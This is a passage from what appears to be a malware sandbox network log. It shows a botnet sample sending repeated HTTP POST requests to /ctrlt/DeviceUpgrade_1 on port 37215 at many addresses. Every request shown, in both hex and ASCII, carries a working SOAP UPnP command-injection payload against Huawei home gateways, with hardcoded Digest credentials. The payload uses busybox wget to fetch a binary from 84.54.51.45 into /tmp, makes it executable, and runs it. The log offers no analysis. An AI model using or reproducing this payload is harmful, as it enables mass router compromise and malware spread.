2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2216192.168.2.154135441.137.206.7337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672314882 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2217192.168.2.155830241.87.116.24237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672322989 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2218192.168.2.156041641.239.169.16537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672362089 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2219192.168.2.153650441.186.251.7337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672406912 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2220192.168.2.155837241.63.88.10437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672406912 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2221192.168.2.154478041.223.141.5437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672406912 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2222192.168.2.154481041.211.4.9537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672410011 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2223192.168.2.155656841.122.110.18137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672518015 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2224192.168.2.153734041.187.187.8137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672544003 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2225192.168.2.155498441.163.41.7737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672544003 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2226192.168.2.153941241.83.250.2637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672579050 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
